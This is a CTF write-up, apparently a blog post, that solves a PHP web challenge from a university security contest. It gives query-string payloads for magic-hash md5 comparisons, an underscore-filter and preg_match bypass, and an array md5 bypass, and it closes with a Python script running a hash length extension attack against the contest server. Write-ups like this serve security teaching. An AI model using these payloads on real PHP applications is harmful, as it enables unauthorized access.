第九届中国海洋大学信息安全竞赛（Web方向）

Zue3r

于 2024-05-20 18:40:10 发布

阅读量446

点赞数 6

分类专栏： CTF 文章标签： php 安全 web安全网络安全

本文链接：https://blog.csdn.net/qq_46548764/article/details/139067867

版权

CTF 专栏收录该内容

9 篇文章 1 订阅

订阅专栏

文章目录

1. ezphp

1. ezphp

<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$a = 'O.U.C';

$query = $_SERVER['QUERY_STRING'];
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
    die('听说你是黑客');
}

echo '你知道b等于什么能绕过这个弱类型吗（〃｀ 3′〃）'.'<br>';
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
    echo "哎呦，不错喔".'<br>';
    $O_U_C=$_GET['O_U_C'];
    if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
        echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
        if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
            echo '好，那么好'.'<br>';
            if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
                echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
            }else{
                echo '告诉你secret的md5值也无妨，反正哈希是不可逆的๑乛◡乛๑，除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
            }
        }else{
            echo '不过如此';
        }
    }else{
        die("不行嘛(´ｪ｀)");
    }
}else{
    echo '嗨害嗨  (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}

考了一堆的php特性，心累。

第一关（变量覆盖）

关键代码如下：

$a = 'O.U.C';
... # 省略一堆代码
$query = $_SERVER['QUERY_STRING'];
parse_str($query);
... # 省略一堆代码
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
    echo "哎呦，不错喔".'<br>';
... # 省略一堆代码

变量覆盖，找俩不同且满足md5加密后以0e开头的字符串，如下：

?a=QNKCDZO&b=240610708

成功绕过，如图。

第二关（传参名特性、preg_match绕过）

关键代码如下：

... # 省略一堆代码
$query = $_SERVER['QUERY_STRING'];
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
    die('听说你是黑客');
}
... # 省略一堆代码
if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
        echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
... # 省略一堆代码

由于对变量名存在过滤，即变量名中不能出现下划线以及点号，此时我们可以利用加号绕过。同时，在非多行匹配的情况下，preg_match()函数会忽略结尾的换行符，Payload如下：

?O+U+C=100%0a

成功绕过，如图。
在这里插入图片描述

第三关（md5绕过、哈希长度扩展攻击）

关键代码如下：

... # 省略一堆代码
if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
            echo '好，那么好'.'<br>';
            if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
                echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
            }else{
                echo '告诉你secret的md5值也无妨，反正哈希是不可逆的๑乛◡乛๑，除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
            }
... # 省略一堆代码

第一层if利用数组绕过，Payload如下：

md51[]=1&md52[]=2

成功绕过，如图。
在这里插入图片描述
第二层if使用哈希长度攻击绕过，利用hash_ext_attack工具，在key长度未知的情况下可以暴破，利用脚本如下：

import requests
import urllib.parse
from hash_ext_attack import HashExtAttack

# POST参数
data = {
    'md51[]': 1,
    'md52[]': 2
}

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'https://127.0.0.1:8080'
}

hash_ext_attack = HashExtAttack()

for len in range(1, 101):
    print("times:" + str(len))
    new_text,new_hash = hash_ext_attack.run('ouc', '06d92f344c7d8c89cb164353ca0fa070', 'zue3r', len)
    new_text = urllib.parse.quote(new_text, safe='&=')
    url = f'http://7153f08b-73b5-46c8-92e7-b3f3afed6725.competition.blue-whale.me:20001/ezPHP.php?a=QNKCDZO&b=240610708&O+U+C=100%0a&md5={new_text}'
    # print(new_text)
    # COOKIE参数
    headers = {
        'Cookie': f'md5={new_hash}'
    }
    res = requests.post(url=url,data=data,proxies=proxies, headers=headers)
    print(res.text)